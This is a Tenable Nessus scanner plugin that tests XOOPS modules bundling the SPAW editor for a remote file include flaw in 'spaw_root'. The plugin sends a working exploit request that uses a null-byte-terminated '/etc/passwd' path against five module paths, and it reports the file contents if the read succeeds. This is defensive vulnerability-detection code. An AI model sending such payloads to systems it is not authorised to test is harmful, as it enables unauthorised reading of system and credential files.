#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP script that is affected by a
remote file include vulnerability. 

Description :

The remote host is running a third-party module for Xoops. 

The version of at least one such module installed on the remote host
includes a copy of the SPAW PHP WYSIWYG editor control that fails to
sanitize user-supplied input to the 'spaw_root' parameter of the
'spaw_control.class.php' script before using it to include PHP code. 
Provided PHP's 'register_globals' setting is enabled, an
unauthenticated attacker can exploit this issue to view arbitrary
files on the remote host or possibly to execute arbitrary PHP code,
perhaps from third-party hosts. 

See also :

http://www.milw0rm.com/exploits/4022
http://www.milw0rm.com/exploits/4063
http://www.milw0rm.com/exploits/4069
http://www.milw0rm.com/exploits/4070
http://www.milw0rm.com/exploits/4084

Solution :

Disable PHP's 'register_globals' setting or contact the product's
author to see if an upgrade exists. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(25372);
  script_version("$Revision: 1.11 $");

  script_cve_id(
    "CVE-2007-3057",
    "CVE-2007-3220",
    "CVE-2007-3221",
    "CVE-2007-3237",
    "CVE-2007-3289"
  );
  script_bugtraq_id(24302, 24470);
  script_xref(name:"OSVDB", value:"35381");
  script_xref(name:"OSVDB", value:"36306");

  script_name(english:"XOOPS Module spaw_root Parameter Remote File Include Vulnerability");
  script_summary(english:"Tries to read a local file with spaw_control.class.php");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("xoops_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Vulnerable modules
nmods = 0;
mod = make_array();
# -   Cjay Content 3
mod[nmods++] = "cjaycontent/admin/editor2";
# -   iContent
mod[nmods++] = "icontent/include/wysiwyg";
# -   TinyContent
mod[nmods++] = "tinycontent/admin/spaw";
# -   WiwiMod
mod[nmods++] = "wiwimod/spaw";
# -   XT-Conteudo
mod[nmods++] = "xt_conteudo/admin/spaw";


info = "";
contents = "";


# Test an install.
install = get_kb_item(string("www/", port, "/xoops"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  # Try to exploit the flaw to read a file.
  file = "/etc/passwd";
  for (i=0; i<nmods; i++)
  {
    req = http_get(
      item:string(
        dir, "/modules/", mod[i], "/spaw_control.class.php?",
        "spaw_root=", file, "%00"
      ), 
      port:port
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # There's a problem if...
    if (
      (
        # there's an entry for root or...
        egrep(pattern:"root:.*:0:[01]:", string:res) ||
        # we get an error saying "failed to open stream" or...
        string("main(", file, "\\0config/spaw_control.config.php): failed to open stream") >< res ||
        # we get an error claiming the file doesn't exist or...
        string("main(", file, "): failed to open stream: No such file") >< res ||
        # we get an error about open_basedir restriction.
        string("open_basedir restriction in effect. File(", file) >< res
      )
    )
    {
      info = info +
             "  " + dir + "/modules/" + mod[i] + "/spaw_control.class.php" + '\n';

      if (!contents && egrep(string:res, pattern:"root:.*:0:[01]:"))
        contents = res;

      if (!thorough_tests) break;
    }
  }
}

if (info)
{
  if (contents)
    info = string(
      info,
      "\n",
      "And here are the (repeated) contents of the file '/etc/passwd' that\n",
      "Nessus was able to read from the remote host :\n",
      "\n",
      contents
    );

  report = string(
    desc,
    "\n\n",
    "Plugin output :\n",
    "\n",
    "The following scripts(s) are vulnerable :\n",
    "\n",
    info
  );

  security_hole(port:port, data:report);
}
